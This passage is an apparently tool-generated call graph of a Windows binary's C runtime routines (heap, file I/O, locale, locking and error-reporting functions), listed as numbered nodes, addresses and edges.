19661->19659 19663 a14486 _free 19662->19663 19664 a1445d HeapFree 19662->19664 19663->19564 19664->19663 19665 a14472 19664->19665 19666 a1a95f __fptostr 64 API calls 19665->19666 19667 a14478 GetLastError 19666->19667 19667->19663 19675 a1c970 19668->19675 19672 a1b631 19708 a1b5eb 19672->19708 19711 a24410 19675->19711 19677 a1c977 19678 a24410 __NMSG_WRITE 66 API calls 19677->19678 19680 a1c984 19677->19680 19678->19680 19679 a1c7c1 __NMSG_WRITE 66 API calls 19681 a1c99c 19679->19681 19680->19679 19682 a1b629 19680->19682 19683 a1c7c1 __NMSG_WRITE 66 API calls 19681->19683 19684 a1c7c1 19682->19684 19683->19682 19685 a1c7e2 __NMSG_WRITE 19684->19685 19686 a24410 __NMSG_WRITE 63 API calls 19685->19686 19707 a1c8fe 19685->19707 19688 a1c7fc 19686->19688 19690 a1c90d GetStdHandle 19688->19690 19691 a24410 __NMSG_WRITE 63 API calls 19688->19691 19689 a1c96e 19689->19672 19694 a1c91b _strlen 19690->19694 19690->19707 19692 a1c80d 19691->19692 19692->19690 19693 a1c81f 19692->19693 19693->19707 19718 a243ad 19693->19718 19697 a1c951 WriteFile 19694->19697 19694->19707 19697->19707 19698 a1c84b GetModuleFileNameW 19699 a1c86c 19698->19699 19702 a1c878 _wcslen 19698->19702 19701 a243ad __NMSG_WRITE 63 API calls 19699->19701 19701->19702 19704 a24250 63 API calls __NMSG_WRITE 19702->19704 19705 a1c8ee 19702->19705 19727 a1a8bb 19702->19727 19730 a242c5 19702->19730 19704->19702 19739 a240e4 19705->19739 19757 a165d1 19707->19757 19773 a1b495 19708->19773 19710 a1b5fc 19712 a2441c 19711->19712 19713 a24426 19712->19713 19714 a1a95f __fptostr 66 API calls 19712->19714 19713->19677 19715 a2443f 19714->19715 19716 a1a90d __fptostr 11 API calls 19715->19716 19717 a2444a 19716->19717 19717->19677 19719 a243c2 19718->19719 19720 a243bb 19718->19720 19721 a1a95f __fptostr 66 API calls 19719->19721 19720->19719 19725 a243e3 19720->19725 19722 a243c7 19721->19722 19723 a1a90d __fptostr 11 API calls 19722->19723 19724 a1c840 19723->19724 19724->19698 19724->19702 19725->19724 19726 a1a95f __fptostr 66 API calls 19725->19726 19726->19722 19765 a1a792 19727->19765 19733 a242d7 19730->19733 19731 a242db 19732 a1a95f __fptostr 66 API calls 19731->19732 19734 a242e0 19731->19734 19738 a242f7 19732->19738 19733->19731 19733->19734 19735 a2431e 19733->19735 19734->19702 19735->19734 19737 a1a95f __fptostr 66 API calls 19735->19737 19736 a1a90d __fptostr 11 API calls 19736->19734 19737->19738 19738->19736 19771 a195ec EncodePointer 19739->19771 19741 a2410a 19742 a24197 19741->19742 19743 a2411a LoadLibraryW 19741->19743 19746 a241b1 DecodePointer DecodePointer 19742->19746 19755 a241c4 19742->19755 19744 a2422f 19743->19744 19745 a2412f GetProcAddress 19743->19745 19751 a165d1 __atodbl_l 5 API calls 19744->19751 19745->19744 19749 a24145 7 API calls 19745->19749 19746->19755 19747 a24223 DecodePointer 19747->19744 19748 a241fa DecodePointer 19748->19747 19752 a24201 19748->19752 19749->19742 19750 a24187 GetProcAddress EncodePointer 19749->19750 19750->19742 19753 a2424e 19751->19753 19752->19747 19754 a24214 DecodePointer 19752->19754 19753->19707 19754->19747 19756 a241e7 19754->19756 19755->19747 19755->19748 19755->19756 19756->19747 19758 a165d9 19757->19758 19759 a165db IsDebuggerPresent 19757->19759 19758->19689 19772 a22685 19759->19772 19762 a1e015 SetUnhandledExceptionFilter UnhandledExceptionFilter 19763 a1e032 __call_reportfault 19762->19763 19764 a1e03a GetCurrentProcess TerminateProcess 19762->19764 19763->19764 19764->19689 19766 a1a7b1 _memset __call_reportfault 19765->19766 19767 a1a7cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19766->19767 19768 a1a89d __call_reportfault 19767->19768 19769 a165d1 __atodbl_l 5 API calls 19768->19769 19770 a1a8b9 GetCurrentProcess TerminateProcess 19769->19770 19770->19702 19771->19741 19772->19762 19774 a1b4a1 __wsopen_helper 19773->19774 19775 a1b7b7 __lock 61 API calls 19774->19775 19776 a1b4a8 19775->19776 19777 a1b4d3 DecodePointer 19776->19777 19783 a1b552 19776->19783 19779 a1b4ea DecodePointer 19777->19779 19777->19783 19788 a1b4fd 19779->19788 19781 a1b5cf __wsopen_helper 19781->19710 19796 a1b5c0 19783->19796 19784 a1b5b7 19801 a1b37d 19784->19801 19788->19783 19790 a1b514 DecodePointer 19788->19790 19793 a1b523 DecodePointer DecodePointer 19788->19793 19794 a195ec EncodePointer 19788->19794 19795 a195ec EncodePointer 19790->19795 19793->19788 19794->19788 19795->19788 19797 a1b5c6 19796->19797 19798 a1b5a0 19796->19798 19804 a1b6de LeaveCriticalSection 19797->19804 19798->19781 19800 a1b6de LeaveCriticalSection 19798->19800 19800->19784 19805 a1b352 GetModuleHandleW 19801->19805 19804->19798 19806 a1b366 GetProcAddress 19805->19806 19807 a1b376 ExitProcess 19805->19807 19806->19807 19808->19618 19812 a1b6de LeaveCriticalSection 19809->19812 19811 a1b7b5 19811->19630 19812->19811 19813->19655 19815 a1731b 19814->19815 19820 a172ac 19814->19820 19816 a1ac6e _malloc DecodePointer 19815->19816 19817 a17321 19816->19817 19821 a1a95f __fptostr 65 API calls 19817->19821 19818 a172b7 19819 a1c970 __FF_MSGBANNER 65 API calls 19818->19819 19818->19820 19824 a1c7c1 __NMSG_WRITE 65 API calls 19818->19824 19827 a1b37d _doexit 3 API calls 19818->19827 19819->19818 19820->19818 19822 a172da RtlAllocateHeap 19820->19822 19825 a17307 19820->19825 19829 a17305 19820->19829 19831 a1ac6e DecodePointer 19820->19831 19823 a17313 19821->19823 19822->19820 19822->19823 19823->19658 19824->19818 19826 a1a95f __fptostr 65 API calls 19825->19826 19826->19829 19827->19818 19830 a1a95f __fptostr 65 API calls 19829->19830 19830->19823 19832 a1ac83 19831->19832 19832->19820 19842 a25071 19833->19842 19835 a25150 19835->19588 20363 a25373 19836->20363 19838 a254d4 19838->19593 20690 a25155 19839->20690 19845 a2507d __wsopen_helper 19842->19845 19843 a25090 19844 a1a95f __fptostr 66 API calls 19843->19844 19846 a25095 19844->19846 19845->19843 19847 a250c6 19845->19847 19848 a1a90d __fptostr 11 API calls 19846->19848 19853 a2493d 19847->19853 19852 a2509f __wsopen_helper 19848->19852 19850 a250e0 19962 a25107 19850->19962 19852->19835 19854 a24964 19853->19854 19966 a27f22 19854->19966 19856 a24bef 19857 a1a8bb __invoke_watson 10 API calls 19856->19857 19859 a25070 __wsopen_helper 19857->19859 19858 a249bf 19992 a1a972 19858->19992 19861 a25090 19859->19861 19868 a250c6 19859->19868 19865 a1a95f __fptostr 66 API calls 19861->19865 19862 a24980 19862->19856 19862->19858 19864 a24a1a 19862->19864 19872 a24aa1 19864->19872 19879 a24a74 19864->19879 19867 a25095 19865->19867 19866 a1a95f __fptostr 66 API calls 19869 a249ce 19866->19869 19871 a1a90d __fptostr 11 API calls 19867->19871 19873 a2493d __tsopen_nolock 120 API calls 19868->19873 19870 a1a90d __fptostr 11 API calls 19869->19870 19884 a249d8 19870->19884 19881 a2509f __wsopen_helper 19871->19881 19874 a1a972 __commit 66 API calls 19872->19874 19875 a250e0 19873->19875 19877 a24aa6 19874->19877 19876 a25107 __wsopen_helper LeaveCriticalSection 19875->19876 19876->19881 19878 a1a95f __fptostr 66 API calls 19877->19878 19880 a24ab0 19878->19880 19973 a23f4b 19879->19973 19882 a1a90d __fptostr 11 API calls 19880->19882 19881->19850 19882->19884 19884->19850 19885 a24b32 19886 a24b3b 19885->19886 19887 a24b5c CreateFileA 19885->19887 19888 a1a972 __commit 66 API calls 19886->19888 19889 a24bf9 GetFileType 19887->19889 19890 a24b89 19887->19890 19891 a24b40 19888->19891 19892 a24c06 GetLastError 19889->19892 19893 a24c4a 19889->19893 19894 a24bc2 GetLastError 19890->19894 19895 a24b9d CreateFileA 19890->19895 19897 a1a95f __fptostr 66 API calls 19891->19897 19898 a1a985 __dosmaperr 66 API calls 19892->19898 20000 a23d15 19893->20000 19995 a1a985 19894->19995 19895->19889 19895->19894 19900 a24b4a 19897->19900 19901 a24c2f CloseHandle 19898->19901 19899 a24be9 19906 a1a95f __fptostr 66 API calls 19899->19906 19903 a1a95f __fptostr 66 API calls 19900->19903 19901->19899 19904 a24c3d 19901->19904 19903->19884 19907 a1a95f __fptostr 66 API calls 19904->19907 19906->19856 19908 a24c42 19907->19908 19908->19899 19909 a24cbe 20009 a21772 19909->20009 19910 a24f5c 19910->19856 19913 a24fe6 CloseHandle 19910->19913 19912 a24d2d 19912->19910 19923 a24e87 19912->19923 19931 a24dd7 19912->19931 19918 a2500f 19913->19918 19915 a24cd1 19919 a1a972 __commit 66 API calls 19915->19919 19916 a24cea 20034 a234e7 19916->20034 19921 a25013 GetLastError 19918->19921 19936 a24ef2 19918->19936 19922 a24cd6 19919->19922 19925 a1a985 __dosmaperr 66 API calls 19921->19925 19922->19912 19961 a24cde 19922->19961 19923->19910 19926 a24dfb 19923->19926 19933 a24ea4 19923->19933 19924 a24d14 19927 a21772 __lseek_nolock 68 API calls 19924->19927 19924->19961 19928 a2501f 19925->19928 19926->19910 19926->19961 20139 a1bee7 19926->20139 19927->19922 20164 a23d96 19928->20164 19929 a234e7 __read_nolock 76 API calls 19937 a24e5c 19929->19937 19931->19910 19931->19926 19938 a24e26 19931->19938 19960 a24e42 19931->19960 19935 a1c47c __lseeki64_nolock 68 API calls 19933->19935 19939 a24eaf 19935->19939 19936->19856 19940 a24f21 19937->19940 19943 a24ee5 19937->19943 19944 a24eff 19937->19944 19947 a24e7e 19937->19947 19937->19961 20129 a1c47c 19938->20129 19939->19926 19942 a24eba 19939->19942 19950 a21772 __lseek_nolock 68 API calls 19940->19950 19951 a1c47c __lseeki64_nolock 68 API calls 19942->19951 19946 a1c5eb __close_nolock 69 API calls 19943->19946 19944->19940 19948 a24f06 19944->19948 19952 a24eec 19946->19952 19947->19910 19953 a21772 __lseek_nolock 68 API calls 19948->19953 19955 a24ec4 19950->19955 19951->19955 19956 a1a95f __fptostr 66 API calls 19952->19956 19957 a24f10 19953->19957 19954 a24e38 19958 a1c47c __lseeki64_nolock 68 API calls 19954->19958 19955->19910 19955->19961 19956->19936 19957->19947 19957->19961 19958->19960 19960->19929 19960->19961 20019 a1c5eb 19961->20019 19963 a25133 19962->19963 19964 a2510c 19962->19964 19963->19852 20362 a23f24 LeaveCriticalSection 19964->20362 19967 a27f43 19966->19967 19968 a27f2e 19966->19968 19967->19862 19969 a1a95f __fptostr 66 API calls 19968->19969 19970 a27f33 19969->19970 19971 a1a90d __fptostr 11 API calls 19970->19971 19972 a27f3e 19971->19972 19972->19862 19974 a23f57 __wsopen_helper 19973->19974 19975 a1b6f5 __mtinitlocknum 66 API calls 19974->19975 19976 a23f67 19975->19976 19977 a1b7b7 __lock 66 API calls 19976->19977 19978 a23f6c __wsopen_helper 19976->19978 19987 a23f7b 19977->19987 19978->19885 19979 a240c6 20191 a240db 19979->20191 19981 a24053 20176 a163fd 19981->20176 19983 a23ffb EnterCriticalSection 19986 a2400b LeaveCriticalSection 19983->19986 19983->19987 19984 a1b7b7 __lock 66 API calls 19984->19987 19986->19987 19987->19979 19987->19981 19987->19983 19987->19984 19988 a23fd1 InitializeCriticalSectionAndSpinCount 19987->19988 20173 a2401d 19987->20173 19988->19987 19991 a240bd 19991->19979 20209 a19723 GetLastError 19992->20209 19994 a1a977 19994->19866 19996 a1a972 __commit 66 API calls 19995->19996 19997 a1a990 _free 19996->19997 19998 a1a95f __fptostr 66 API calls 19997->19998 19999 a1a9a3 19998->19999 19999->19899 20001 a23d23 20000->20001 20002 a23d7c 20000->20002 20001->20002 20007 a23d47 20001->20007 20003 a1a95f __fptostr 66 API calls 20002->20003 20004 a23d81 20003->20004 20005 a1a972 __commit 66 API calls 20004->20005 20006 a23d72 20005->20006 20006->19909 20006->19910 20006->19912 20007->20006 20008 a23d6c SetStdHandle 20007->20008 20008->20006 20259 a23e1c 20009->20259 20011 a21781 20012 a21797 SetFilePointer 20011->20012 20013 a21787 20011->20013 20015 a217b6 20012->20015 20016 a217ae GetLastError 20012->20016 20014 a1a95f __fptostr 66 API calls 20013->20014 20017 a2178c 20014->20017 20015->20017 20018 a1a985 __dosmaperr 66 API calls 20015->20018 20016->20015 20017->19915 20017->19916 20018->20017 20020 a23e1c __lseek_nolock 66 API calls 20019->20020 20023 a1c5fb 20020->20023 20021 a1c651 20022 a23d96 __free_osfhnd 67 API calls 20021->20022 20024 a1c659 20022->20024 20023->20021 20025 a23e1c __lseek_nolock 66 API calls 20023->20025 20033 a1c62f 20023->20033 20030 a1a985 __dosmaperr 66 API calls 20024->20030 20031 a1c67b 20024->20031 20027 a1c626 20025->20027 20026 a23e1c __lseek_nolock 66 API calls 20028 a1c63b CloseHandle 20026->20028 20032 a23e1c __lseek_nolock 66 API calls 20027->20032 20028->20021 20029 a1c647 GetLastError 20028->20029 20029->20021 20030->20031 20031->19908 20032->20033 20033->20021 20033->20026 20035 a23503 20034->20035 20036 a2351e 20034->20036 20037 a1a972 __commit 66 API calls 20035->20037 20038 a2352d 20036->20038 20040 a2354c 20036->20040 20039 a23508 20037->20039 20041 a1a972 __commit 66 API calls 20038->20041 20043 a1a95f __fptostr 66 API calls 20039->20043 20042 a2356a 20040->20042 20056 a2357e 20040->20056 20044 a23532 20041->20044 20045 a1a972 __commit 66 API calls 20042->20045 20057 a23510 20043->20057 20047 a1a95f __fptostr 66 API calls 20044->20047 20049 a2356f 20045->20049 20046 a235d4 20048 a1a972 __commit 66 API calls 20046->20048 20050 a23539 20047->20050 20051 a235d9 20048->20051 20052 a1a95f __fptostr 66 API calls 20049->20052 20053 a1a90d __fptostr 11 API calls 20050->20053 20054 a1a95f __fptostr 66 API calls 20051->20054 20055 a23576 20052->20055 20053->20057 20054->20055 20059 a1a90d __fptostr 11 API calls 20055->20059 20056->20046 20056->20057 20058 a235b3 20056->20058 20060 a235ed 20056->20060 20057->19924 20098 a27cb1 20057->20098 20058->20046 20065 a235be ReadFile 20058->20065 20059->20057 20062 a163b8 __malloc_crt 66 API calls 20060->20062 20066 a23603 20062->20066 20063 a23a61 GetLastError 20067 a238e8 20063->20067 20068 a23a6e 20063->20068 20064 a236e9 20064->20063 20071 a236fd 20064->20071 20065->20063 20065->20064 20069 a2362b 20066->20069 20070 a2360d 20066->20070 20076 a1a985 __dosmaperr 66 API calls 20067->20076 20081 a2386d 20067->20081 20073 a1a95f __fptostr 66 API calls 20068->20073 20072 a1c47c __lseeki64_nolock 68 API calls 20069->20072 20074 a1a95f __fptostr 66 API calls 20070->20074 20071->20081 20091 a23719 20071->20091 20092 a2392d 20071->20092 20072->20065 20075 a23a73 20073->20075 20077 a23612 20074->20077 20078 a1a972 __commit 66 API calls 20075->20078 20076->20081 20079 a1a972 __commit 66 API calls 20077->20079 20078->20081 20079->20057 20080 a14452 _free 66 API calls 20080->20057 20081->20057 20081->20080 20082 a239a2 ReadFile 20085 a239c1 GetLastError 20082->20085 20082->20092 20083 a2377d ReadFile 20084 a2379b GetLastError 20083->20084 20083->20091 20084->20091 20085->20092 20087 a238e2 GetLastError 20087->20067 20088 a237fa 20088->20081 20089 a23875 20088->20089 20090 a23868 20088->20090 20094 a23832 MultiByteToWideChar 20088->20094 20089->20094 20097 a1c47c __lseeki64_nolock 68 API calls 20089->20097 20093 a1a95f __fptostr 66 API calls 20090->20093 20091->20083 20091->20088 20095 a1c47c __lseeki64_nolock 68 API calls 20091->20095 20092->20081 20092->20082 20096 a1c47c __lseeki64_nolock 68 API calls 20092->20096 20093->20081 20094->20081 20094->20087 20095->20091 20096->20092 20097->20094 20099 a1c47c __lseeki64_nolock 68 API calls 20098->20099 20100 a27cd0 20099->20100 20101 a27d33 20100->20101 20102 a1c47c __lseeki64_nolock 68 API calls 20100->20102 20103 a1a95f __fptostr 66 API calls 20101->20103 20104 a27d3e 20101->20104 20107 a27cec 20102->20107 20103->20104 20104->19924 20105 a27dce 20111 a1c47c __lseeki64_nolock 68 API calls 20105->20111 20125 a27e37 20105->20125 20106 a27d12 GetProcessHeap HeapAlloc 20108 a27d2e 20106->20108 20114 a27d45 __setmode_nolock 20106->20114 20107->20101 20107->20105 20107->20106 20110 a1a95f __fptostr 66 API calls 20108->20110 20109 a1c47c __lseeki64_nolock 68 API calls 20109->20101 20110->20101 20112 a27de7 20111->20112 20112->20101 20113 a23e1c __lseek_nolock 66 API calls 20112->20113 20115 a27dfd SetEndOfFile 20113->20115 20120 a27db1 20114->20120 20128 a27d88 __setmode_nolock 20114->20128 20272 a1b7ea 20114->20272 20117 a27e1a 20115->20117 20115->20125 20118 a1a95f __fptostr 66 API calls 20117->20118 20119 a27e1f 20118->20119 20122 a1a972 __commit 66 API calls 20119->20122 20121 a1a972 __commit 66 API calls 20120->20121 20123 a27db6 20121->20123 20124 a27e2a GetLastError 20122->20124 20126 a1a95f __fptostr 66 API calls 20123->20126 20123->20128 20124->20125 20125->20101 20125->20109 20126->20128 20127 a27d96 GetProcessHeap HeapFree 20127->20125 20128->20127 20130 a23e1c __lseek_nolock 66 API calls 20129->20130 20131 a1c49a 20130->20131 20132 a1c4b3 SetFilePointer 20131->20132 20133 a1c4a2 20131->20133 20134 a1c4cb GetLastError 20132->20134 20137 a1c4a7 20132->20137 20135 a1a95f __fptostr 66 API calls 20133->20135 20136 a1c4d5 20134->20136 20134->20137 20135->20137 20138 a1a985 __dosmaperr 66 API calls 20136->20138 20137->19926 20137->19954 20138->20137 20140 a1bef3 __wsopen_helper 20139->20140 20141 a1bf16 20140->20141 20142 a1befb 20140->20142 20144 a1bf22 20141->20144 20147 a1bf5c 20141->20147 20143 a1a972 __commit 66 API calls 20142->20143 20145 a1bf00 20143->20145 20146 a1a972 __commit 66 API calls 20144->20146 20148 a1a95f __fptostr 66 API calls 20145->20148 20149 a1bf27 20146->20149 20150 a23e85 ___lock_fhandle 68 API calls 20147->20150 20157 a1bf08 __wsopen_helper 20148->20157 20151 a1a95f __fptostr 66 API calls 20149->20151 20153 a1bf62 20150->20153 20152 a1bf2f 20151->20152 20154 a1a90d __fptostr 11 API calls 20152->20154 20155 a1bf70 20153->20155 20156 a1bf84 20153->20156 20154->20157 20158 a1b7ea __write_nolock 94 API calls 20155->20158 20159 a1a95f __fptostr 66 API calls 20156->20159 20157->19926 20160 a1bf7c 20158->20160 20161 a1bf89 20159->20161 20358 a1bfb3 20160->20358 20162 a1a972 __commit 66 API calls 20161->20162 20162->20160 20165 a23e02 20164->20165 20166 a23da7 20164->20166 20167 a1a95f __fptostr 66 API calls 20165->20167 20166->20165 20172 a23dd2 20166->20172 20168 a23e07 20167->20168 20169 a1a972 __commit 66 API calls 20168->20169 20170 a23df8 20169->20170 20170->19936 20171 a23df2 SetStdHandle 20171->20170 20172->20170 20172->20171 20194 a1b6de LeaveCriticalSection 20173->20194 20175 a24024 20175->19987 20179 a16406 20176->20179 20178 a16443 20178->19979 20181 a23e85 20178->20181 20179->20178 20180 a16424 Sleep 20179->20180 20195 a1dde6 20179->20195 20180->20179 20182 a23e91 __wsopen_helper 20181->20182 20183 a23eeb 20182->20183 20184 a1b7b7 __lock 66 API calls 20182->20184 20185 a23ef0 EnterCriticalSection 20183->20185 20187 a23f0d __wsopen_helper 20183->20187 20186 a23ebd 20184->20186 20185->20187 20188 a23ec6 InitializeCriticalSectionAndSpinCount 20186->20188 20189 a23ed9 20186->20189 20187->19991 20188->20189 20204 a23f1b 20189->20204 20208 a1b6de LeaveCriticalSection 20191->20208 20193 a240e2 20193->19978 20194->20175 20196 a1ddf2 20195->20196 20197 a1de0d 20195->20197 20196->20197 20198 a1ddfe 20196->20198 20200 a1de20 HeapAlloc 20197->20200 20202 a1ac6e _malloc DecodePointer 20197->20202 20203 a1de47 20197->20203 20199 a1a95f __fptostr 65 API calls 20198->20199 20201 a1de03 20199->20201 20200->20197 20200->20203 20201->20179 20202->20197 20203->20179 20207 a1b6de LeaveCriticalSection 20204->20207 20206 a23f22 20206->20183 20207->20206 20208->20193 20224 a195fe TlsGetValue 20209->20224 20212 a19790 SetLastError 20212->19994 20213 a19742 20214 a163fd __calloc_crt 62 API calls 20213->20214 20215 a1974e 20214->20215 20215->20212 20216 a19756 DecodePointer 20215->20216 20217 a1976b 20216->20217 20218 a19787 20217->20218 20219 a1976f 20217->20219 20221 a14452 _free 62 API calls 20218->20221 20227 a1966f 20219->20227 20223 a1978d 20221->20223 20222 a19777 GetCurrentThreadId 20222->20212 20223->20212 20225 a19613 DecodePointer TlsSetValue 20224->20225 20226 a1962e 20224->20226 20225->20226 20226->20212 20226->20213 20240 a1a9b0 20227->20240 20229 a1967b GetModuleHandleW 20230 a1b7b7 __lock 64 API calls 20229->20230 20231 a196b9 InterlockedIncrement 20230->20231 20241 a19711 20231->20241 20234 a1b7b7 __lock 64 API calls 20235 a196da 20234->20235 20244 a1d6e5 InterlockedIncrement 20235->20244 20237 a196f8 20256 a1971a 20237->20256 20239 a19705 __wsopen_helper 20239->20222 20240->20229 20242 a1b6de _doexit LeaveCriticalSection 20241->20242 20243 a196d3 20242->20243 20243->20234 20245 a1d703 InterlockedIncrement 20244->20245 20246 a1d706 20244->20246 20245->20246 20247 a1d710 InterlockedIncrement 20246->20247 20248 a1d713 20246->20248 20247->20248 20249 a1d720 20248->20249 20250 a1d71d InterlockedIncrement 20248->20250 20251 a1d72a InterlockedIncrement 20249->20251 20253 a1d72d 20249->20253 20250->20249 20251->20253 20252 a1d746 InterlockedIncrement 20252->20253 20253->20252 20254 a1d756 InterlockedIncrement 20253->20254 20255 a1d761 InterlockedIncrement 20253->20255 20254->20253 20255->20237 20257 a1b6de _doexit LeaveCriticalSection 20256->20257 20258 a19721 20257->20258 20258->20239 20260 a23e29 20259->20260 20262 a23e41 20259->20262 20261 a1a972 __commit 66 API calls 20260->20261 20263 a23e2e 20261->20263 20264 a1a972 __commit 66 API calls 20262->20264 20265 a23e80 20262->20265 20266 a1a95f __fptostr 66 API calls 20263->20266 20267 a23e52 20264->20267 20265->20011 20269 a23e36 20266->20269 20268 a1a95f __fptostr 66 API calls 20267->20268 20270 a23e5a 20268->20270 20269->20011 20271 a1a90d __fptostr 11 API calls 20270->20271 20271->20269 20273 a1b7f9 __ftelli64_nolock 20272->20273 20274 a1b82f 20273->20274 20275 a1b84e 20273->20275 20307 a1b824 20273->20307 20277 a1a972 __commit 66 API calls 20274->20277 20279 a1b8aa 20275->20279 20280 a1b88d 20275->20280 20276 a165d1 __atodbl_l 5 API calls 20278 a1bee5 20276->20278 20281 a1b834 20277->20281 20278->20114 20283 a1b8b1 20279->20283 20284 a1b8c0 20279->20284 20282 a1a972 __commit 66 API calls 20280->20282 20285 a1a95f __fptostr 66 API calls 20281->20285 20287 a1b892 20282->20287 20288 a1c47c __lseeki64_nolock 68 API calls 20283->20288 20338 a223d6 20284->20338 20289 a1b83b 20285->20289 20292 a1a95f __fptostr 66 API calls 20287->20292 20293 a1b8bd 20288->20293 20290 a1a90d __fptostr 11 API calls 20289->20290 20290->20307 20291 a1b8c6 20294 a1bb68 20291->20294 20347 a1979c 20291->20347 20295 a1b89a 20292->20295 20293->20284 20297 a1bb77 20294->20297 20298 a1be18 WriteFile 20294->20298 20296 a1a90d __fptostr 11 API calls 20295->20296 20296->20307 20300 a1bc32 20297->20300 20309 a1bb8a 20297->20309 20302 a1be4b GetLastError 20298->20302 20332 a1bb4a 20298->20332 20305 a1bd0c 20300->20305 20312 a1bc3f 20300->20312 20302->20332 20303 a1be96 20303->20307 20310 a1a95f __fptostr 66 API calls 20303->20310 20304 a1b90a 20304->20294 20306 a1b91a GetConsoleCP 20304->20306 20305->20303 20315 a1bd7d WideCharToMultiByte 20305->20315 20331 a1b93d 20306->20331 20306->20332 20307->20276 20308 a1bbd4 WriteFile 20308->20302 20322 a1bc08 20308->20322 20309->20303 20309->20308 20314 a1beb9 20310->20314 20311 a1be69 20316 a1be74 20311->20316 20317 a1be88 20311->20317 20312->20303 20313 a1bcae WriteFile 20312->20313 20313->20302 20320 a1bce2 20313->20320 20321 a1a972 __commit 66 API calls 20314->20321 20315->20302 20318 a1bdb4 WriteFile 20315->20318 20323 a1a95f __fptostr 66 API calls 20316->20323 20319 a1a985 __dosmaperr 66 API calls 20317->20319 20324 a1bdeb GetLastError 20318->20324 20329 a1bddf 20318->20329 20319->20307 20320->20312 20325 a1bc2d 20320->20325 20320->20332 20321->20307 20322->20309 20322->20325 20322->20332 20326 a1be79 20323->20326 20324->20329 20325->20332 20327 a1a972 __commit 66 API calls 20326->20327 20327->20307 20329->20305 20329->20318 20329->20325 20329->20332 20330 a23cfb 78 API calls __fassign 20330->20331 20331->20330 20331->20332 20333 a1b9e9 WideCharToMultiByte 20331->20333 20335 a1ba41 20331->20335 20352 a225d6 20331->20352 20332->20303 20332->20307 20332->20311 20333->20332 20334 a1ba1a WriteFile 20333->20334 20334->20302 20334->20335 20335->20302 20335->20331 20335->20332 20336 a23ba3 WriteConsoleW CreateFileW __write_nolock 20335->20336 20337 a1ba6e WriteFile 20335->20337 20336->20335 20337->20302 20337->20335 20339 a223f2 20338->20339 20340 a223e3 20338->20340 20342 a22410 20339->20342 20343 a1a95f __fptostr 66 API calls 20339->20343 20341 a1a95f __fptostr 66 API calls 20340->20341 20346 a223e8 20341->20346 20342->20291 20344 a22403 20343->20344 20345 a1a90d __fptostr 11 API calls 20344->20345 20345->20346 20346->20291 20348 a19723 __getptd_noexit 66 API calls 20347->20348 20349 a197a4 20348->20349 20350 a197b1 GetConsoleMode 20349->20350 20351 a1b61f __amsg_exit 66 API calls 20349->20351 20350->20294 20350->20304 20351->20350 20355 a2259e 20352->20355 20356 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 20355->20356 20357 a225b1 20356->20357 20357->20331 20361 a23f24 LeaveCriticalSection 20358->20361 20360 a1bfb9 20360->20157 20361->20360 20362->19963 20364 a25381 20363->20364 20365 a25385 20363->20365 20364->19838 20377 a15b6b 20365->20377 20368 a253c9 20370 a1a95f __fptostr 66 API calls 20368->20370 20369 a253ec 20372 a1a95f __fptostr 66 API calls 20369->20372 20374 a2539a __setlocale_nolock 20369->20374 20371 a253ce 20370->20371 20375 a1a90d __fptostr 11 API calls 20371->20375 20373 a253f9 20372->20373 20376 a1a90d __fptostr 11 API calls 20373->20376 20374->19838 20375->20374 20376->20374 20378 a15b7e 20377->20378 20382 a15bcb 20377->20382 20379 a1979c __getptd 66 API calls 20378->20379 20380 a15b83 20379->20380 20381 a15bab 20380->20381 20385 a1d9a5 20380->20385 20381->20382 20400 a1d224 20381->20400 20382->20368 20382->20369 20382->20374 20386 a1d9b1 __wsopen_helper 20385->20386 20387 a1979c __getptd 66 API calls 20386->20387 20388 a1d9b6 20387->20388 20389 a1d9e4 20388->20389 20390 a1d9c8 20388->20390 20391 a1b7b7 __lock 66 API calls 20389->20391 20392 a1979c __getptd 66 API calls 20390->20392 20393 a1d9eb 20391->20393 20394 a1d9cd 20392->20394 20416 a1d958 20393->20416 20398 a1d9db __wsopen_helper 20394->20398 20399 a1b61f __amsg_exit 66 API calls 20394->20399 20398->20381 20399->20398 20401 a1d230 __wsopen_helper 20400->20401 20402 a1979c __getptd 66 API calls 20401->20402 20403 a1d235 20402->20403 20404 a1b7b7 __lock 66 API calls 20403->20404 20405 a1d247 20403->20405 20406 a1d265 20404->20406 20408 a1d255 __wsopen_helper 20405->20408 20412 a1b61f __amsg_exit 66 API calls 20405->20412 20407 a1d2ae 20406->20407 20409 a1d296 InterlockedIncrement 20406->20409 20410 a1d27c InterlockedDecrement 20406->20410 20686 a1d2bf 20407->20686 20408->20382 20409->20407 20410->20409 20413 a1d287 20410->20413 20412->20408 20413->20409 20414 a14452 _free 66 API calls 20413->20414 20415 a1d295 20414->20415 20415->20409 20417 a1d99a 20416->20417 20418 a1d965 20416->20418 20424 a1da12 20417->20424 20418->20417 20419 a1d6e5 ___addlocaleref 8 API calls 20418->20419 20420 a1d97b 20419->20420 20420->20417 20427 a1d774 20420->20427 20685 a1b6de LeaveCriticalSection 20424->20685 20426 a1da19 20426->20394 20428 a1d785 InterlockedDecrement 20427->20428 20429 a1d808 20427->20429 20430 a1d79a InterlockedDecrement 20428->20430 20431 a1d79d 20428->20431 20429->20417 20441 a1d80d 20429->20441 20430->20431 20432 a1d7a7 InterlockedDecrement 20431->20432 20433 a1d7aa 20431->20433 20432->20433 20434 a1d7b4 InterlockedDecrement 20433->20434 20435 a1d7b7 20433->20435 20434->20435 20436 a1d7c1 InterlockedDecrement 20435->20436 20437 a1d7c4 20435->20437 20436->20437 20438 a1d7dd InterlockedDecrement 20437->20438 20439 a1d7ed InterlockedDecrement 20437->20439 20440 a1d7f8 InterlockedDecrement 20437->20440 20438->20437 20439->20437 20440->20429 20442 a1d891 20441->20442 20444 a1d824 20441->20444 20443 a1d8de 20442->20443 20445 a14452 _free 66 API calls 20442->20445 20455 a1d907 20443->20455 20511 a1e84d 20443->20511 20444->20442 20452 a14452 _free 66 API calls 20444->20452 20454 a1d858 20444->20454 20447 a1d8b2 20445->20447 20449 a14452 _free 66 API calls 20447->20449 20456 a1d8c5 20449->20456 20450 a14452 _free 66 API calls 20457 a1d886 20450->20457 20451 a14452 _free 66 API calls 20451->20455 20458 a1d84d 20452->20458 20453 a1d94c 20459 a14452 _free 66 API calls 20453->20459 20460 a14452 _free 66 API calls 20454->20460 20470 a1d879 20454->20470 20455->20453 20461 a14452 66 API calls _free 20455->20461 20462 a14452 _free 66 API calls 20456->20462 20463 a14452 _free 66 API calls 20457->20463 20471 a1ee9a 20458->20471 20465 a1d952 20459->20465 20466 